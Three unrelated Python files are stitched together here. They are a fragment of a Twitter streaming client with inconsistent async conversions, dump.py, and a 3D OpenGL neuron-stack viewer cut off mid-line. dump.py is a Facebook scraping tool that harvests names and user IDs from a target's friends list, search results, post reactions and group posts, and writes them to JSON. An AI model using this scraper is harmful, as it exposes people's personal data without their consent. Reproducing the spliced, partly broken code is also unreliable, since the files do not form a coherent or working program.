self.session.params = None async def _run(self): # Authenticate url = "https://%s%s" % (self.host, self.url) # Connect and process the stream error_counter = 0 resp = None exc_info = None while self.running: if self.retry_count is not None: if error_counter > self.retry_count: # quit if error count greater than retry count break try: auth = self.auth.apply_auth() resp = self.session.request('POST', url, data=self.body, timeout=self.timeout, stream=True, auth=auth, verify=self.verify, proxies=self.proxies) if resp.status_code != 200: if self.listener.on_error(resp.status_code) is False: break error_counter += 1 if resp.status_code == 420: self.retry_time = max(self.retry_420_start, self.retry_time) sleep(self.retry_time) self.retry_time = min(self.retry_time * 2, self.retry_time_cap) else: error_counter = 0 self.retry_time = self.retry_time_start self.snooze_time = self.snooze_time_step self.listener.on_connect() await self._read_loop(resp) except (Timeout, ssl.SSLError) as exc: # This is still necessary, as a SSLError can actually be # thrown when using Requests # If it's not time out treat it like any other exception if isinstance(exc, ssl.SSLError): if not (exc.args and 'timed out' in str(exc.args[0])): exc_info = sys.exc_info() break if self.listener.on_timeout() is False: break if self.running is False: break sleep(self.snooze_time) self.snooze_time = min(self.snooze_time + self.snooze_time_step, self.snooze_time_cap) except Exception as exc: exc_info = sys.exc_info() # any other exception is fatal, so kill loop break # cleanup self.running = False if resp: resp.close() self.new_session() if exc_info: # call a handler first so that the exception can be logged. self.listener.on_exception(exc_info[1]) six.reraise(*exc_info) async def _data(self, data): if await self.listener.on_data(data) is False: self.running = False async def _read_loop(self, resp): charset = resp.headers.get('content-type', default='') enc_search = re.search(r'charset=(?P<enc>\S*)', charset) if enc_search is not None: encoding = enc_search.group('enc') else: encoding = 'utf-8' buf = ReadBuffer(resp.raw, self.chunk_size, encoding=encoding) while self.running and not resp.raw.closed: length = 0 while not resp.raw.closed: line = buf.read_line() stripped_line = line.strip() if line else line # line is sometimes None so we need to check here if not stripped_line: self.listener.keep_alive() # keep-alive new lines are expected elif stripped_line.isdigit(): length = int(stripped_line) break else: raise TweepError('Expecting length, unexpected value found') next_status_obj = buf.read_len(length) if self.running and next_status_obj: await self._data(next_status_obj) # # Note: keep-alive newlines might be inserted before each length value. # # read until we get a digit... # c = b'\n' # for c in resp.iter_content(decode_unicode=True): # if c == b'\n': # continue # break # # delimited_string = c # # # read rest of delimiter length.. # d = b'' # for d in resp.iter_content(decode_unicode=True): # if d != b'\n': # delimited_string += d # continue # break # # # read the next twitter status object # if delimited_string.decode('utf-8').strip().isdigit(): # status_id = int(delimited_string) # next_status_obj = resp.raw.read(status_id) # if self.running: # self._data(next_status_obj.decode('utf-8')) if resp.raw.closed: self.on_closed(resp) async def _start(self, is_async): self.running = True if is_async: self._thread = Thread(target=self._run) self._thread.daemon = self.daemon self._thread.start() else: await self._run() def on_closed(self, resp): """ Called when the response has been closed by Twitter """ pass def userstream(self, stall_warnings=False, _with=None, replies=None, track=None, locations=None, is_async=False, encoding='utf8'): self.session.params = {'delimited': 'length'} if self.running: raise TweepError('Stream object already connected!') self.url = '/%s/user.json' % STREAM_VERSION self.host = 'userstream.twitter.com' if stall_warnings: self.session.params['stall_warnings'] = stall_warnings if _with: self.session.params['with'] = _with if replies: self.session.params['replies'] = replies if locations and len(locations) > 0: if len(locations) % 4 != 0: raise TweepError("Wrong number of locations points, " "it has to be a multiple of 4") self.session.params['locations'] = ','.join(['%.2f' % l for l in locations]) if track: self.session.params['track'] = u','.join(track).encode(encoding) self._start(is_async) def firehose(self, count=None, is_async=False): self.session.params = {'delimited': 'length'} if self.running: raise TweepError('Stream object already connected!') self.url = '/%s/statuses/firehose.json' % STREAM_VERSION if count: self.url += '&count=%s' % count self._start(is_async) def retweet(self, is_async=False): self.session.params = {'delimited': 'length'} if self.running: raise TweepError('Stream object already connected!') self.url = '/%s/statuses/retweet.json' % STREAM_VERSION self._start(is_async) def sample(self, is_async=False, languages=None, stall_warnings=False): self.session.params = {'delimited': 'length'} if self.running: raise TweepError('Stream object already connected!') self.url = '/%s/statuses/sample.json' % STREAM_VERSION if languages: self.session.params['language'] = ','.join(map(str, languages)) if stall_warnings: self.session.params['stall_warnings'] = 'true' self._start(is_async) async def filter(self, follow=None, track=None, is_async=False, locations=None, stall_warnings=False, languages=None, encoding='utf8', filter_level=None): self.body = {} self.session.headers['Content-type'] = "application/x-www-form-urlencoded" if self.running: raise TweepError('Stream object already connected!') self.url = '/%s/statuses/filter.json' % STREAM_VERSION if follow: self.body['follow'] = u','.join(follow).encode(encoding) if track: self.body['track'] = u','.join(track).encode(encoding) if locations and len(locations) > 0: if len(locations) % 4 != 0: raise TweepError("Wrong number of locations points, " "it has to be a multiple of 4") self.body['locations'] = u','.join(['%.4f' % l for l in locations]) if stall_warnings: self.body['stall_warnings'] = stall_warnings if languages: self.body['language'] = u','.join(map(str, languages)) if filter_level: self.body['filter_level'] = filter_level.encode(encoding) self.session.params = {'delimited': 'length'} await self._start(is_async) def sitestream(self, follow, stall_warnings=False, with_='user', replies=False, is_async=False): self.body = {} if self.running: raise TweepError('Stream object already connected!') self.url = '/%s/site.json' % STREAM_VERSION self.body['follow'] = u','.join(map(six.text_type, follow)) self.body['delimited'] = 'length' if stall_warnings: self.body['stall_warnings'] = stall_warnings if with_: self.body['with'] = with_ if replies: self.body['replies'] = replies self._start(is_async) def disconnect(self): if self.running is False: return self.running = False
dump.py
#!/usr/bin/python3 # coding=utf-8 ####################################################### # File : dump.py # # Author : Rizal F # # Github : https://github.com/Rizal-XD # # Facebook : https://www.facebook.com/AKUN.KERTASS # # Python version : 3.8+ # ####################################################### # RECODE? OKE CANTUMKAN NAMA PEMBUAT # ####################################################### from threading import (Thread, Event) from src.CLI import (color, prints, inputs, write, br) import re, time, json, os from datetime import datetime class Dump: def __init__(self, store=None): self.store = store self.event = Event() self.__id__ = [] self.__filter__ = [] self.proccess = None def reset(self): self.__id__ = [] self.__filter__ = [] def save(self, saveTo): datetimes = self.store.getDateTime() self.event.clear() time.sleep(2) saveTo = re.sub('\s\s+', '_', saveTo.lower()) save = open('dump/%s.json'%(saveTo), 'w') save.write(json.dumps({ 'created_at': datetimes, 'file_name': '%s.json'%(saveTo), 'data': self.__id__ })) save.close() br(2) prints('!p!Hasil tersimpan : !k!dump/%s.json'%(saveTo)) prints('!p!ID terambil : !k!%s' %(len(self.__id__))) br(1) return self.store.instance.back() def animate(self): while self.event.is_set(): for i in list('\ |/-•'): count = len(self.__id__) datetimes = datetime.now().strftime('%H:%M:%S') self.proccess = '!p![!h!%s!p!]!ran! Writing ID (%s).. %s !r!'%(datetimes, count, i) prints(self.proccess, with_flush=True) time.sleep(0.1) def run(self): self.reset() self.event.set() th = Thread(target=self.animate) th.start() def getIDFriedsList(self, stop=False, path='/friends/center/friends', saveTo='friendsList'): while stop == False: response = self.store.http.get(path).bs4() for x in response.find_all(style='vertical-align: middle'): hrefs = x.find('a') if '+' not in str(hrefs) and hrefs != None: name = str(hrefs.text) uid = re.findall(r'/\?uid=(\d+)&' if '/?uid=' in str(hrefs) else '/(.*?)\?fref=', hrefs['href']) prints(f'\r!p!*!ran! {name}', blank_right=int(len(self.proccess)-20)) if len(uid) == 1 and str(uid[0]) not in self.__filter__: self.__filter__.append(str(uid[0])) self.__id__.append({'name': str(name), 'id': str(uid[0])}) if 'Lihat selengkapnya' in str(response): path = response.find('a', string='Lihat selengkapnya')['href'] else: stop = True return self.save(saveTo) def friendsList(self): th = Thread(target=self.getIDFriedsList, args=(False,)) th.start() self.run() return self def publicID(self, path=None): prints('!h!INGFO:!p!pastikan daftar teman bersifat publik, jika ngedump lebih dari 3k ID') prints('!m!mungkin akun anda akan kena limit!, dan tidak dapat menggunakan fitur ini lagi.!p!') br(1) prints("!p!Contoh : !h!zuck") while path == None: ids = inputs('!p!USERNAME TARGET :!h! ') response = self.store.http.get(f'/{str(ids)}').bs4() name = self.store.http.currentTitle() for x in response.find_all('a'): if '/friends?lst=' in str(x): path = x['href'] break if path == None: br(1) prints('!m!Id atau username salah atau teman tidak publik.') br(1) continue br(1) prints('!p!Nama akun: !k!%s!r!' %(name)) br(1) th = Thread(target=self.getIDpublic, args=(False, path, ids,)) th.start() self.run() return self def getIDpublic(self, stop=False, path='/', saveTo='public'): while stop == False: response = self.store.http.get(path).bs4() for x in response.find_all(style='vertical-align: middle'): hrefs = x.find('a') if '+' not in str(hrefs) and hrefs != None: name = str(hrefs.text) uid = re.findall(r'/\?uid=(\d+)&' if '/?uid=' in str(hrefs) else '/(.*?)\?fref=', hrefs['href']) prints(f'\r!p!*!ran! {name}', blank_right=int(len(self.proccess)-20)) if len(uid) == 1 and str(uid[0]) not in self.__filter__: self.__filter__.append(str(uid[0])) self.__id__.append({'name': str(name), 'id': str(uid[0])}) if 'Lihat Teman Lain' in str(response): path = response.find('a', string='Lihat Teman Lain')['href'] else: stop = True return self.save(saveTo) def search(self): query = inputs('!p!Kata kunci : !h!') path = f'/search/people/?q={query}&source=filter&isTrending=0' while True: try: max = int(inputs('!p!Limit (!b!100!p!) : !b!')) break except (ValueError): br(1) prints('!m! Yang bener lah !') br(1) continue br(1) th = Thread(target=self.getIDSearch, args=(False, path, query, max)) th.start() self.run() return self def getIDSearch(self, stop=False, path='/', saveTo='search', max=0, base_url=True): while stop == False: response = self.store.http.get(path, base_url).bs4() for x in response.find_all('a'): div = x.find('div') if '+' not in str(div) and div != None: name = str(div.text) uid = re.findall(r'/\?id=(\d+)&' if '/?id=' in str(x) else '/(.*?)\?refid=', str(x)) prints(f'\r!p!*!ran! {name}', blank_right=int(len(self.proccess)-20)) if int(len(self.__id__)) == max or int(len(self.__id__)) > max: stop = True break if len(uid) == 1 and str(uid[0]) not in self.__filter__: self.__filter__.append(str(uid[0])) self.__id__.append({'name': str(name), 'id': str(uid[0])}) if 'Lihat Hasil Selanjutnya' in str(response) and stop == False: path = response.find('a', string='Lihat Hasil Selanjutnya')['href'] base_url = False else: stop = True return self.save(saveTo) def react(self, path=None): prints('!p!INPUT LINK POSTINGAN TARGET! ') prints('!p!(!h!CONTOH :!h!https://www.facebook.com/4/posts/10112184244817511/?app=fbl!m!)') br(1) while True: try: link = inputs('!p!Link postingan : !h!') domain = link.split('//')[1].split('/')[0] link = link.replace(domain, 'mbasic.facebook.com') except IndexError: br(1) prints('!m!Link salah atau tidak valid...') br(1) continue response = self.store.http.get(link, base_url=False).bs4() title = self.store.http.currentTitle().replace(' | Facebook', '') for x in response.find_all('a'): if '/ufi/reaction/profile/browser/?' in str(x): br(1) prints('!p!TITLE: !k!%s' %(title)) br(1) path = x['href'] break if path != None: break else: br(1) prints('!m!Postingan tidak ditemukan...') br(1) continue while True: try: max = int(inputs('!p!Limit (!k!100!p!) :!h! ')) break except (ValueError): br(1) prints('!m!Yang bener lah !..') br(1) continue br(1) th = Thread(target=self.getIDReact, args=(False, path, 'react', max,)) th.start() self.run() return self def getIDReact(self, stop=False, path='/', saveTo='react', max=0): while stop == False: response = self.store.http.get(path).bs4() for x in response.find_all('h3'): hrefs = x.find('a') if '+' not in str(hrefs) and hrefs != None: name = str(x.text) uid = re.findall(r'\/profile.php\?id=(\d+)$' if 'profile.php?id=' in str(x) else '\/(.*?)$', str(hrefs['href'])) prints(f'\r!p!*!ran! {name}', blank_right=int(len(self.proccess)-20)) if int(len(self.__id__)) == max or int(len(self.__id__)) > max: stop = True break if len(uid) == 1 and str(uid[0]) not in self.__filter__: self.__filter__.append(str(uid[0])) self.__id__.append({'name': str(name), 'id': str(uid[0])}) if 'Lihat Selengkapnya' in str(response) and stop == False: path = response.find('a', string='Lihat Selengkapnya')['href'] else: stop = True return self.save(saveTo) def postGroup(self): while True: id = inputs('!p!ID group : !b!') path = f'/groups/{str(id)}' response = self.store.http.get(path).text() if 'Konten Tidak Ditemukan' in str(response): br(1) prints('!m!Id group tidak ditemukan') br(1) continue else: title = self.store.http.currentTitle() br(1) prints('!p!Nama group : !k!%s' %(title)) br(1) try: max = int(inputs('!p!Limit (!b!100!p!) : !b!')) break except (ValueError): br(1) prints('!m!Yang bener lah !...') br(1) continue br(1) th = Thread(target=self.getIDPostGroup, args=(False, path, id, max)) th.start() self.run() return self def getIDPostGroup(self, stop=False, path='/', saveTo='postGroup', max=0): while stop == False: response = self.store.http.get(path).bs4() for x in response.find_all('h3'): hrefs = x.find('a') if '+' not in str(hrefs) and hrefs != None: name = str(hrefs.text) uid = re.findall(r'content_owner_id_new.(\d+)', hrefs['href']) prints(f'\r!p!*!ran! {name}', blank_right=int(len(self.proccess)-20)) if int(len(self.__id__)) == max or int(len(self.__id__)) > max: stop = True break if len(uid) == 1 and str(uid[0]) not in self.__filter__: self.__filter__.append(str(uid[0])) self.__id__.append({'name': str(name), 'id': str(uid[0])}) if 'Lihat Postingan Lainnya' in str(response) and stop == False: path = response.find('a', string='Lihat Postingan Lainnya')['href'] else: stop = True return self.save(saveTo)
viewer_3d.py
#------------------------- #3d Renderer #Daniel Miron #7/5/2013 # #Allows 3d viewing of nerve cord or neuron stacks. #Includes ability to fully rotate image in 3 dimensions and to mark locations in 3-space # #Version Date: 7/26 10:30 #------------------------- import sys sys.path.append('.') import h5py import numpy as np import glob import os import pickle import math import re import time import threading from Queue import Queue from OpenGL.GLUT import * from OpenGL.GLU import * from OpenGL.GL import * try: from OpenGL.GLUT.freeglut import * except Exception: pass import arcball as arc from pysqlite2 import dbapi2 as sqlite import cv2 import select import extractor import input_handler as handler from ctypes import util try: from OpenGL.platform import win32 except AttributeError: pass class Viewer: def __init__(self, location, in_q, directory, max_x, max_y): self.st = time.time() self.win_h = 1000 self.win_w = 1000 self.arcball = self.create_arcball() self.directory = directory self.in_q =in_q self.max_x = max_x #highest resolution self.max_y = max_y #highest resolution self.rows = 0 self.columns = 0 self.layers = 0 self.fov = 60 self.aspect = float(self.win_w)/self.win_h self.left = None #keep track of left button status self.pick_location = location self.display_list_idx = 2 #count from 1 and use first index for box self.display_list_dict = dict() #COLOR as key, display_list indices as value self.marker_color = [1., 1., 1.] #initial marker is white self.first = True #used to control display list flow self.icon_color = np.array((0.0, 1.0, 0.0)) self.st = time.time() self.center_x = 0 self.center_y = 0 self.extractor_dict = dict() #keys are indices, values are extractor threads self.make_lists = True self.num_labels = 0 self.label_dict = dict() #keys are float indices, values are labels def set_dimensions(self, rows, columns, layers, w): '''sets the dimensions of the viewing box''' self.rows = rows self.columns = columns self.layers = layers self.x2x = 1; self.y2x = float(columns)/rows; self.z2x = float(layers)/rows; self.pick_location = (self.pick_location[0]/pow(2, w) - 1, self.pick_location[1]/pow(2, w) - 1, self.pick_location[2]) def main(self): glutInit(sys.argv) glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_DEPTH | GLUT_ALPHA) glutInitWindowSize(self.win_w, self.win_h) #width, height glutCreateWindow("3D View") glMatrixMode(GL_PROJECTION) glLoadIdentity() gluPerspective(self.fov, self.aspect, 1, 10) glMatrixMode(GL_MODELVIEW) glShadeModel(GL_SMOOTH) glEnable(GL_DEPTH_TEST) glEnable(GL_LIGHTING) glEnable(GL_LIGHT0) glEnable(GL_NORMALIZE) glColorMaterial(GL_FRONT_AND_BACK, GL_EMISSION) glEnable(GL_COLOR_MATERIAL) glLightfv(GL_LIGHT0, GL_SPECULAR, (0,0,0)) glutDisplayFunc(self.draw) glutKeyboardFunc(self.keyboard) glutMouseFunc(self.on_click) glutMotionFunc(self.on_drag) glutMouseWheelFunc(self.on_scroll) glutIdleFunc(self.on_idle) glutReshapeFunc(self.on_resize) glutMainLoop() return def on_resize(self, w, h): '''resize the viewing window''' self.win_h = h self.win_w = w glViewport(0,0, w,h) self.arcball.place([self.win_w/2, self.win_h/2], self.win_w/2) def translate(self, x, y): '''translate the viewing box based on mouse location''' self.center_x = self.center_x+((float(x)/self.win_w)-.5)*2 self.center_y = self.center_y-((float(y)/self.win_h)-.5)*2 def shift(self, key): '''translate the viewing box based on keyboard input''' #may want to tune the translation levels better if key == chr(105): self.center_y -=float(self.fov)**2/10000 elif key == chr(106): self.center_x +=float(self.fov)**2/10000 elif key == chr(107): self.center_y += float(self.fov)**2/10000 elif key == chr(108): self.center_x -=float(self.fov)**2/10000 def reset_translation(self): '''reset the viewing box to 0 translation''' self.center_x = 0 self.center_y = 0 glutPostRedisplay() def reset_zoom(self): '''reset the zoom level''' self.fov = 60 glutPostRedisplay() def reset(self): self.reset_translation() self.reset_zoom() def on_idle(self): timer = time.time() while(not self.in_q.empty() and time.time()-timer<.1): self.icon_color = (self.icon_color + .01)%1 #resets to black when icon is green since 1.0 and 0.0 %1 are equal temp = self.in_q.get() if temp[0] == "marker": self.pick_location = temp[1:][0] self.pick_location[0] = int(float(self.pick_location[0]*self.columns)/self.max_x) self.pick_location[1] = int(float(self.pick_location[1]*self.rows)/self.max_y) elif temp[0] == "ids": self.num_labels += 1 label_idx = self.num_labels self.label_dict[label_idx] = temp[1:][0][0][0] extr = extractor.Extractor(self.in_q, self.directory, temp[1:][0], self.pick_location, self.max_x, self.max_y, label_idx) self.extractor_dict[temp[1][0][0]] = extr extracting_worker = threading.Thread(target = extr.run, name = "extr") extracting_worker.daemon = True extracting_worker.start() elif temp[0] == "contours": contours = temp[1] color = temp[2] primary_label = temp[3] normals = temp[4] label_idx = temp[5] if self.make_lists: self.make_display_lists(contours, color/255.0, primary_label, normals, label_idx) elif temp[0] == "limits": self.max_x= temp[1] self.max_y = temp[2] self.layers = temp[3] elif temp[0] == "refresh": self.refresh() elif temp[0] == "remove": self.remove_label(temp[1:][0]) self.st = time.time() glutPostRedisplay() #set icon to green if processes are done if time.time()-self.st > 0.25: self.icon_color = np.array((0.0, 1.0, 0.0)) self.make_lists = True glutPostRedisplay() def loading_icon(self): glBegin(GL_QUADS) glVertex3f(-1.0, -1.0, 1.0) glVertex3f(-.95, -1.0, 1.0) glVertex3f(-.95, -.95, 1.0) glVertex3f(-1.0, -.95, 1.0) glEnd() def refresh(self): '''Clears all contours and deletes working extractors''' #first display list is for the box self.num_labels = 0 glDeleteLists(2, self.display_list_idx) self.in_q.queue.clear() self.make_lists = False self.display_list_idx = 2 for key in self.extractor_dict.keys(): self.extractor_dict[key].stop() glutPostRedisplay() def undo(self): label = self.display_list_dict.keys()[0] for display_list in self.display_list_dict[label]: glDeleteLists(display_list, 1) #delete back and front lists glutPostRedisplay() def remove_label(self, ids): '''remove a single contour''' for display_list in self.display_list_dict[ids[0]]: glDeleteLists(display_list, 1) self.extractor_dict[ids[0]].stop() glutPostRedisplay() def create_arcball(self): arcball = arc.Arcball() #locate the arcball center at center of window with radius half the width arcball.place([self.win_w/2, self.win_h/2], self.win_w/2) return arcball def make_display_lists(self, contours, color, label, normals, label_idx): '''Generates display lists to draw both the front and back buffered images''' if self.first: #make the box display_list = glGenLists(1) self.axes() self.make_box_list() self.first = False self.display_lists = glGenLists(2) #first list for front, second for back if label in self.display_list_dict: self.display_list_dict[label] = self.display_list_dict[label] + [self.display_list_idx, self.display_list_idx+1] else: self.display_list_dict[label] = [self.display_list_idx, self.display_list_idx+1] self.make_front_list(contours, color, normals) self.make_back_list(contours, label_idx) self.display_list_idx +=2 def make_back_list(self, contours, label_idx): '''Creates a display list to encode color for image. Not seen by user''' glNewList(self.display_list_idx+1, GL_COMPILE) glDisable(GL_LIGHTING) #don't use lighting for color encoding glMatrixMode(GL_MODELVIEW) glPushMatrix() #glTranslatef(-.9, .9, .9) glTranslatef(-.9*self.x2x, .9*self.y2x, .9*self.z2x) glScalef(1.8*self.x2x/self.columns, -1.8*self.y2x/self.rows, -1.8*self.z2x/self.layers) #glScalef(1.8/self.columns, -1.8/self.rows, -1.8/self.layers) #draw the layers glEnableClientState(GL_VERTEX_ARRAY) glEnableClientState(GL_COLOR_ARRAY) for cnt in contours: colors = np.zeros((cnt.shape[0], 4), np.float) colors[:, :3] = cnt colors[:, 0] /= self.columns - 1 colors[:, 1] /= - (self.rows - 1) colors[:, 2] /= - (self.layers - 1) colors[:, 1:3] += 1 colors[:, 3] = label_idx/255.0 glVertexPointer(3, GL_INT, 0, cnt) glColorPointer(4, GL_FLOAT, 0, colors) glDrawArrays(GL_TRIANGLE_STRIP, 0, cnt.shape[0]) glDisableClientState(GL_VERTEX_ARRAY) glDisableClientState(GL_COLOR_ARRAY) glPopMatrix() glEnable(GL_LIGHTING) glEndList() def make_front_list(self, contours, color, normals): '''Creates a display list to draw a box and the data scaled to .9*the size of the window. This list deals with the display seen by the user''' glNewList(self.display_list_idx, GL_COMPILE) glMatrixMode(GL_MODELVIEW) glPushMatrix() glTranslatef(-.9*self.x2x, .9*self.y2x, .9*self.z2x) glScalef(1.8*self.x2x/self.columns, -1.8*self.y2x/self.rows, -1.8*self.z2x/self.layers) #glScalef(1.8/self.columns, -1.8/self.rows, -1.8/self.layers) #draw the layers glMaterialfv(GL_FRONT_AND_BACK, GL_AMBIENT_AND_DIFFUSE, color) glEnableClientState(GL_VERTEX_ARRAY) glEnableClientState(GL_NORMAL_ARRAY) glEnableClientState(GL_COLOR_ARRAY) for cnt, normal in zip(contours, normals): colors = np.zeros_like(normal) colors[...] = np.array(color) colors[cnt[:, 0] == self.columns, :] = np.array([1, 0, 0]) colors[cnt[:, 0] == 0, :] = np.array([1, 0, 0]) colors[cnt[:, 1] == self.rows, :] = np.array([0, 1, 0]) colors[cnt[:, 1] == 0, :] = np.array([0, 1, 0]) colors[cnt[:, 2] == self.layers - 1, :] = np.array([0, 1, 1]) colors[cnt[:, 2] == 0, :] = np.array([0, 1, 1]) glVertexPointer(3, GL_INT, 0, cnt) glNormalPointer(GL_FLOAT, 0, normal) glColorPointer(3, GL_FLOAT, 0, colors) glDrawArrays(GL_TRIANGLE_STRIP, 0, cnt.shape[0]) glDisableClientState(GL_VERTEX_ARRAY) glDisableClientState(GL_NORMAL_ARRAY) glDisableClientState(GL_COLOR_ARRAY) glPopMatrix() glEndList() def make_box_list(self): '''makes a display list to draw the box''' x = self.x2x*.9; y = self.y2x*.9; z = self.z2x*.9; glNewList(1, GL_COMPILE) glMatrixMode(GL_MODELVIEW) glPushMatrix() #make a box around the image glBegin(GL_LINES) glColor3f(1.0, 0, 0) #x in red glVertex3f(-x, -y, -z) glVertex3f(x, -y, -z) glVertex3f(-x, y, -z) glVertex3f(x, y, -z) glVertex3f(-x, -y, z) glVertex3f(x, -y, z) glVertex3f(-x, y, z) glVertex3f(x, y, z) ''' glVertex3f(-.9, -.9, -.9) glVertex3f(.9, -.9, -.9) glVertex3f(-.9, .9, -.9) glVertex3f(.9, .9, -.9) glVertex3f(-.9, -.9, .9) glVertex3f(.9, -.9, .9) glVertex3f(-.9, .9, .9) glVertex3f(.9, .9, .9) ''' glColor3f(0,1.0, 0) #y in green glVertex3f(-x, -y, -z) glVertex3f(-x, y, -z) glVertex3f(x, -y, -z) glVertex3f(x, y, -z) glVertex3f(-x, y, z) glVertex3f(-x, -y, z) glVertex3f(x, -y, z) glVertex3f(x, y, z) ''' glVertex3f(-.9, -.9, -.9) glVertex3f(-.9, .9, -.9) glVertex3f(.9, -.9, -.9) glVertex3f(.9, .9, -.9) glVertex3f(-.9, .9, .9) glVertex3f(-.9, -.9, .9) glVertex3f(.9, -.9, .9) glVertex3f(.9, .9, .9) ''' glColor3f(0,0,1.0) #z in blue glVertex3f(-x, -y, -z) glVertex3f(-x, -y, z) glVertex3f(x, -y, -z) glVertex3f(x, -y, z) glVertex3f(-x, y, -z) glVertex3f(-x, y, z) glVertex3f(x, y, -z) glVertex3f(x, y, z) ''' glVertex3f(-.9, -.9, -.9) glVertex3f(-.9, -.9, .9) glVertex3f(.9, -.9, -.9) glVertex3f(.9, -.9, .9) glVertex3f(-.9, .9, -.9) glVertex3f(-.9, .9, .9) glVertex3f(.9, .9, -.9) glVertex3f(.9, .9, .9) ''' glEnd() glDisable(GL_LIGHTING) glColor3f(0.5, 0.5, 0.5) glRasterPos3f(-.9*self.x2x, .9*self.y2x, .9*self.z2x) glutBitmapString(GLUT_BITMAP_TIMES_ROMAN_24, "(0,0,0)") glRasterPos3f(.9*self.x2x, .9*self.y2x, .9*self.z2x) glutBitmapString(GLUT_BITMAP_TIMES_ROMAN_24, "x=" + str(self.columns-1)) glRasterPos3f(-.9*self.x2x, -.9*self.y2x, .9*self.z2x) glutBitmapString(GLUT_BITMAP_TIMES_ROMAN_24, "y= " + str(self.rows-1)) glRasterPos3f(-.9*self.x2x, .9*self.y2x, -.9*self.z2x) glutBitmapString(GLUT_BITMAP_TIMES_ROMAN_24, "z= " + str(self.layers-1)) glEnable(GL_LIGHTING) glPopMatrix() glEndList() def draw(self, pick=False): '''draws an image''' glMatrixMode(GL_PROJECTION) glLoadIdentity() gluPerspective(self.fov, self.aspect, 1, 10) glMatrixMode(GL_MODELVIEW) glDrawBuffer(GL_BACK) glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT) glLoadIdentity() gluLookAt(self.center_x,self.center_y, 3, self.center_x, self.center_y, 2, 0,1,0) #Draw icon after rotating glColor3fv(self.icon_color) self.loading_icon() glColor3f(0.0, 0.0, 0.0) glMultMatrixd(self.arcball.matrix().T) glCallList(1)#draw the box and loading icon if not pick: #even numbers for display for idx in range(2, self.display_list_idx+1, 2): glCallList(idx) self.draw_marker() glutSwapBuffers() else: #odd numbers for picking for idx in range(3, self.display_list_idx+1, 2): glCallList(idx) glFlush() return def draw_marker(self): '''Draws a sphere around the chosen point. Color is inverse of chosen pixel''' glMaterialfv(GL_FRONT_AND_BACK, GL_AMBIENT_AND_DIFFUSE, (0.0, 0.0, 0.0)) glMatrixMode(GL_MODELVIEW) glPushMatrix() location = self.pick_location glTranslatef(self.x2x*(1.8*location[0]/self.columns-.9), -self.y2x*(1.8*location[1]/self.rows-.9), -self.z2x*(1.8*location[2]/self.layers-.9)) glColor3fv(self.marker_color) glMaterial glutSolidSphere(.01, 50, 50) glTranslatef(-self.x2x*(1.8*location[0]/self.columns-.9), self.y2x*(1.8*location[1]/self.rows-.9),0) #draw a square parellel to z plane at z level of marker glBegin(GL_LINES) glColor3f(1.0, 1.0, 1.0) glVertex3f(-.9*self.x2x, -.9*self.y2x, 0) glVertex3f(.9*self.x2x, -.9*self.y2x, 0) glVertex3f(-.9*self.x2x, .9*self.y2x, 0) glVertex3f(.9*self.x2x, .9*self.y2x, 0) glVertex3f(-.9*self.x2x, -.9*self.y2x, 0) glVertex3f(-.9*self.x2x, .9*self.y2x, 0) glVertex3f(.9*self.x2x, -.9*self.y2x, 0) glVertex3f(.9*self.x2x, .9*self.y2x, 0) glVertex3f(-.9*self.x2x, .9*self.y2x, 0) glVertex3f(-.9*self.x2x, -.9*self.y2x, 0) glVertex3f(.9*self.x2x, -.9*self.y2x, 0) glVertex3f(.9*self.x2x, .9*self.y2x, 0) glEnd() glColor3f(1.0, 0, 0) glRasterPos(.9*self.x2x, .9*self.y2x, 0) glutBitmapString(GLUT_BITMAP_TIMES_ROMAN_24, "z= " + str(location[2])) glPopMatrix() def keyboard(self, key, x, y): key = key.lower() if key == chr(27): #escape to quit sys.exit() if key == chr(8): #backspace to refresh/clear self.refresh() if key == chr(117): #u to undo self.undo() if key == chr(116): #t to translate to mouse location self.translate(x,y) if key == chr(99): #c to center the box self.reset_translation() if (key == chr(105) or key == chr(106) or key == chr(107) or key == chr(108)): #i, j, k, l to translate by increment self.shift(key) if (key == chr(114)): #r to reset the translation and zoom self.reset() if (key == chr(122)): #z to reset the zoom self.reset_zoom() return def on_scroll(self, wheel, direction, x, y): '''zooms in and out on mouse scroll wheel''' self.fov -= 1 if direction == 1 else -1 glutPostRedisplay() def on_click(self, button, state, x, y): #Left click for arcball rotation if (button == GLUT_LEFT_BUTTON and state == GLUT_DOWN): self.left = True #turn on dragging rotation self.arcball.down((x,y)) #right click to select a pixel location elif (button == GLUT_RIGHT_BUTTON and state == GLUT_DOWN): self.left = False #turn off dragging rotation self.draw(pick=True) self.pick_location, self.marker_color, self.label = self.pick(x,y) print "location", self.pick_location[0], self.pick_location[1], self.pick_location[2], self.label #send the label location to mojo sys.stdout.flush() self.has_marker = True def pick(self, x,y): '''gets the (x,y,z) location in the full volume of a chosen pixel''' click_color = None glReadBuffer(GL_BACK) temp = glReadPixels(x,self.win_h-y, 1,1, GL_RGBA, GL_FLOAT)[0][0] click_color = temp[:3] label_idx = int(temp[3]*255.0 + .5) label = self.label_dict[label_idx] if not np.all(click_color==0): location = [int(click_color[0]*(self.columns-1)), int(-(click_color[1]-1)*(self.rows-1)), int(-(click_color[2]-1)*((self.layers-1)))] glReadBuffer(GL_FRONT) marker_color_neg = glReadPixels(x,self.win_h-y, 1,1, GL_RGB, GL_FLOAT)[0][0] marker_color = 1-marker_color_neg return location, marker_color, label return self.pick_location, self.marker_color, self.label def on_drag(self, x, y): '''rotates image on dragging with left mouse down''' if self.left: self.arcball.drag((x,y)) glutPostRedisplay() def axes(self): '''generates vertices for a box''' self.x_axis = [[[0,0,0], [self.columns, 0,0]], [[0,self.rows,0], [self.columns, self.rows, 0]], [[0,0,self.layers], [self.columns,0,self.layers]], [[0, self.rows, self.layers], [self.columns, self.rows, self.layers]]] self.y_axis = [[[0,0,0], [0, self.rows,0]], [[self.columns,0,0],[self.columns, self.rows, 0]], [[0,0,self.layers], [0,self.rows, self.layers]], [[self.columns, 0, self.layers],[self.columns, self.rows, self.layers]]] self.z_axis = [[[0,0,0], [0,0,self.layers]], [[self.columns,0,0],[self.columns, 0, self.layers]], [[0, self.rows,0], [0, self.rows, self.layers]],[[self.columns, self.rows, 0],[self.columns, self.rows, self.layers]]] if __name__ == '__main__': print OpenGL.GL.__file__, OpenGL.GLU.__file__, OpenGL.GLUT.__file__ display_queue = Queue() sys.argv.pop(0) #extract command line arguments directory = sys.argv[0] location = (int(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3])) #x,y,z max_x =int(sys.argv[4]) max_y = 